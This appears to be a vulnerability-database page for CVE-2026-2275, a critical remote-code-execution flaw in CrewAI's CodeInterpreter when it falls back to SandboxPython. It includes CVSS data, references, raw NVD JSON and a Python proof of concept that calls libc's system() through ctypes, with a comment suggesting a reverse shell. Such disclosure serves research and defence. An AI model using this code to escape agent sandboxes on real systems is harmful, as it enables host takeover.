CVE-2026-2275

Description

The CrewAI CodeInterpreter tool falls back to SandboxPython when it cannot reach Docker, which can enable RCE through arbitrary C function calling.

CVSS Details

CVSS Score

9.6

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CrewAI CodeInterpreter (所有在Docker不可用时回退至SandboxPython的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import ctypes
import sys

# Proof of Concept for CVE-2026-2275
# This simulates the arbitrary C function call when Docker is unreachable and SandboxPython is active.

def execute_shell_command(command):
    try:
        # Load the C standard library (libc on Linux, msvcrt on Windows)
        if sys.platform.startswith('linux'):
            libc = ctypes.CDLL('libc.so.6')
        elif sys.platform == 'darwin':
            libc = ctypes.CDLL('libSystem.dylib')
        elif sys.platform == 'win32':
            libc = ctypes.cdll.msvcrt
        else:
            return "Unsupported platform"

        # Define the argument and return type for the system function
        libc.system.argtypes = [ctypes.c_char_p]
        libc.system.restype = ctypes.c_int

        # Execute the command
        result = libc.system(command.encode('utf-8'))
        return f"Command executed with return code: {result}"
    except Exception as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    # Example command: create a file or run a reverse shell
    cmd = "touch /tmp/crewai_poc.txt"
    print(f"Attempting to execute: {cmd}")
    print(execute_shell_command(cmd))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2275
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2275
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2275/
[4] VulDB https://vuldb.com/cve/CVE-2026-2275
[5] https://docs.crewai.com/en/tools/ai-ml/codeinterpretertool
[6] https://www.kb.cert.org/vuls/id/221883

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2275", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:04.557", "lastModified": "2026-04-01T14:24:21.833", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CrewAI CodeInterpreter tool falls back to SandboxPython when it cannot reach Docker, which can enable RCE through arbitrary C function calling."}, {"lang": "es", "value": "La herramienta CodeInterpreter de CrewAI recurre a SandboxPython cuando no puede acceder a Docker, lo que puede habilitar RCE mediante la llamada arbitraria a funciones C."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}], "references": [{"url": "https://docs.crewai.com/en/tools/ai-ml/codeinterpretertool", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/221883", "source": "[email protected]"}]}}